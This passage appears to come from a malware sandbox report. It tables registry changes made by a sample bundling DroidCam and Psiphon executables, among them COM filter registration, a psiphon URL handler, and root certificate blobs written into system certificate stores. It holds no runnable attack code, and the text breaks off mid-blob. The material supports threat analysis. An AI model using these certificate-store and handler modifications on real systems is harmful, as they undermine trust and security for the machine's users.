| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\CLSID = "{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4aa8-BFA9-4B196644964C} | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell\open | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FriendlyName = "DroidCam Source 2" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\DevicePath = "droidcam:2" | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\ = "DroidCam Source 2" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FilterData = 02000000000060000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000007669647300001000800000aa00389b7100000000000000000000000000000000 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\ = "DroidCam Source 2" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FilterData = 02000000000060000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000007669647300001000800000aa00389b7100000000000000000000000000000000 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\DevicePath = "droidcam:2" | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\\bloatware\\3.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ = "C:\\Program Files (x86)\\DroidCam\\lib\\DroidCamFilter64.ax" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FriendlyName = "DroidCam Source 2" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4aa8-BFA9-4B196644964C} | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell\open\command | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ThreadingModel = "Both" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ThreadingModel = "Both" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\ = "URL:psiphon" | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ = "C:\\Program Files (x86)\\DroidCam\\lib\\DroidCamFilter32.ax" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\CLSID = "{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\URL Protocol | C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\REQUEST | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\ADDRESSBOOK\Certificates\0789B35FD5C2EF8142E6AAE3B58FFF14E4F13136\Blob = 0300000001000000140000000789b35fd5c2ef8142e6aae3b58fff14e4f13136180000000100000010000000021dfb9b16b1303a97b0bf78cda68e46190000000100000010000000d2ad89d215fd92fee49a4c3941f6764a140000000100000014000000932ca752938ca1308712e92885d692a8c4ba68510f00000001000000200000004d0948e616196706e4aed75a88243863a88ff351afc50d0f9e948353618c011e040000000100000010000000a58d756a52cdd9c0488b755d46d4df71200000000100000026050000308205223082040aa00302010202100aa099e64e214d655801ea38ad876711300d06092a864886f70d01010b05003072310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3131302f0603550403132844696769436572742053484132204173737572656420494420436f6465205369676e696e67204341301e170d3230303931303030303030305a170d3233313130323132303030305a305f310b30090603550406130243413110300e060355040813074f6e746172696f3110300e06035504071307546f726f6e746f31153013060355040a130c50736970686f6e20496e632e311530130603550403130c50736970686f6e20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a2903fcbeb078b484066cdac20fed2173f0d1e3651bc3f78c0b89cd9ad1d36ca07291b60264e08bbdc3f3a7c6391a55e806e96d00c6e476d096476aa6e99f841861e81799cb12ddd0f05ab79f7f4aa3796bdf4ce65897824d533fe733c36356c763139392bfa40699af1bd824a97e12ce1375931833eeecff55bec12762ac8cffd6b4c9c89172fb072fa675aac514f67f71069f11bfa82b344e592669db683eddaa655ab68dd38a01537e4616c96b285fa444ec74cd020479fd423765046fdfff218a63f647a2e0a41f1af02341143e26ea3805248675153539361a22022e96acb6f9a8bd1cc46050fc582f6aef5f03515a081d86107e0203e2f3fa403a8cef90203010001a38201c5308201c1301f0603551d230418301680145ac4b97b2a0aa3a5ea7103c060f92df665750e58301d0603551d0e04160414932ca752938ca1308712e92885d692a8c4ba6851300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330770603551d1f0470306e3035a033a031862f687474703a2f2f63726c332e64696769636572742e636f6d2f736861322d617373757265642d63732d67312e63726c3035a033a031862f687474703a2f2f63726c342e64696769636572742e636f6d2f736861322d617373757265642d63732d67312e63726c304c0603551d2004453043303706096086480186fd6c0301302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533008060667810c01040130818406082b0601050507010104783076302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304e06082b060105050730028642687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727453484132417373757265644944436f64655369676e696e6743412e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101005dd2a32986111896351096581a68ca1073d27ac2c6f78d4b371457e616d7e7ee131828e23f0cc54b9e45fb53691a0687abcf4b642eff06628b340dd01e7d3718db0627e143fb1734f965e35857e4994f25c2d60dd92a263a4956cb14c3c105c32631abb2350156b2411fef84ac8125a94e41b6433d3b4e6d6b470e5b84ea91d4cffbf58eb7ad67b77fdc8289b8ca044a4375a32982ef1db8ee7b0067fdf616a9c383a57d67d72affb98b250a35d146be0cffcf248c11aad7c20c67dc1bd7eb5abad226918bf10c58189530408f52107e4c3715ae9ef42d0e88c8948ad2b35e1875841b979e40469d22d2be0df095dfd4be037ae5d46b340c6e8e6fa35f6c4a28 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 | C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\ADDRESSBOOK\Certificates\0789B35FD5C2EF8142E6AAE3B58FFF14E4F13136 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\DroidCam\lib\insdrv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130